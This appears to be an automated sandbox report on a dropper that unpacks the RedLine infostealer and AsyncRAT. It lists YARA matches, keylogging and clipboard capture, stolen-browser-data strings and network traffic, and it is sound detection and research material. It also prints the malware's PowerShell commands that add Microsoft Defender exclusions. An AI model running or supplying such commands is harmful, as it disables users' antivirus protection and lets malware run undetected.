Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.1768144280.00000217574C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ion=v4.5
Source: wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.dr String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: powershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: YsrQekGS.exe.0.dr, XLogger.cs .Net Code: KeyboardLayout
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

Operating System Destruction
barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process information set: 01 00 00 00 Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00406894: __EH_prolog,_wcslen,_wcscpy,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,_wcscpy,_wcscpy,_wcscpy,_wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00406894
Detected potential crypto function
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00417AED 0_2_00417AED
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00401D01 0_2_00401D01
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0042702C 0_2_0042702C
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041A974 0_2_0041A974
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0040497E 0_2_0040497E
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0040C9D5 0_2_0040C9D5
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_004281AC 0_2_004281AC
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_004169B4 0_2_004169B4
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041BA49 0_2_0041BA49
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041B21D 0_2_0041B21D
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041F284 0_2_0041F284
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041429D 0_2_0041429D
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00427AB4 0_2_00427AB4
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00415B20 0_2_00415B20
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0040C3B1 0_2_0040C3B1
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_004143B9 0_2_004143B9
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00413C71 0_2_00413C71
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_004104A9 0_2_004104A9
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00427570 0_2_00427570
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041AE49 0_2_0041AE49
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00405608 0_2_00405608
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0040C608 0_2_0040C608
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0041B629 0_2_0041B629
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_004146D4 0_2_004146D4
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00402F24 0_2_00402F24
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_0040FF2D 0_2_0040FF2D
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00428FF1 0_2_00428FF1
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Code function: 2_2_012EE7B0 2_2_012EE7B0
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Code function: 2_2_012EDC90 2_2_012EDC90
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Code function: 2_2_06544368 2_2_06544368
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Code function: 2_2_06543760 2_2_06543760
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Code function: 2_2_065497B0 2_2_065497B0
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Code function: 2_2_0654D7B0 2_2_0654D7B0
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Code function: 2_2_06541210 2_2_06541210
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Code function: 2_2_0654D2A8 2_2_0654D2A8
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B276F86 4_2_00007FFD9B276F86
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B277D32 4_2_00007FFD9B277D32
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B278588 4_2_00007FFD9B278588
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B2737F2 4_2_00007FFD9B2737F2
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Code function: 4_2_00007FFD9B273655 4_2_00007FFD9B273655
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FFD9B3830E9 13_2_00007FFD9B3830E9
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe 3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: String function: 0041F84C appears 37 times
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: String function: 0041A250 appears 37 times
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: String function: 0041A860 appears 47 times
Sample file is different than original file name gathered from version info
Source: Ekpb7jn7mf.exe, 00000000.00000003.1668539137.00000000006DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCALC.EXEj% vs Ekpb7jn7mf.exe
Source: Ekpb7jn7mf.exe, 00000000.00000002.1670344761.00000000006DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCALC.EXEj% vs Ekpb7jn7mf.exe
Source: Ekpb7jn7mf.exe, 00000000.00000003.1667476911.00000000006DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCALC.EXEj% vs Ekpb7jn7mf.exe
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameretest.exe4 vs Ekpb7jn7mf.exe
Source: Ekpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameImplosions.exe4 vs Ekpb7jn7mf.exe
Uses 32bit PE files
Source: Ekpb7jn7mf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 4.0.YsrQekGS.exe.4b0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 2.0.wjoqZlIS.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: Ekpb7jn7mf.exe PID: 6356, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: wjoqZlIS.exe PID: 6528, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: YsrQekGS.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: YsrQekGS.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: YsrQekGS.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: YsrQekGS.exe.0.dr, Settings.cs Base64 encoded string: 'OvIq3p/is46tW6jYGf6J298wGKVnNDD+Q2jMC9umDUXxUFGs+v2lXZqpyZYLPXWp', 'pxd6c+vbo7J2E6lUd3a2wKCIlIC2gxvRYuDZ7sQjEHLV31h+0MRraKVVx1LSrTHV'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/57@3/3
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_004064DD GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 0_2_004064DD
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Code function: 0_2_00419925 CoCreateInstance, 0_2_00419925
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe File created: C:\Users\user\AppData\Local\Yandex Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Mutant created: \Sessions\1\BaseNamedObjects\BjImkAWMcrtpfpkF
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_6674281 Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Command line argument: sfxname 0_2_0040FCFB
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Command line argument: STARTDLG 0_2_0040FCFB
Source: Ekpb7jn7mf.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: tmpC5A4.tmp.2.dr, tmpC593.tmp.2.dr, tmpC582.tmp.2.dr, tmpC572.tmp.2.dr, tmpC594.tmp.2.dr, tmpC5A5.tmp.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Ekpb7jn7mf.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe File read: C:\Users\user\Desktop\Ekpb7jn7mf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Ekpb7jn7mf.exe "C:\Users\user\Desktop\Ekpb7jn7mf.exe"
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe"
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe"
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe"
Source: unknown Process created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe" Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe" Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Process created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe' Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: riched32.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Ekpb7jn7mf.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
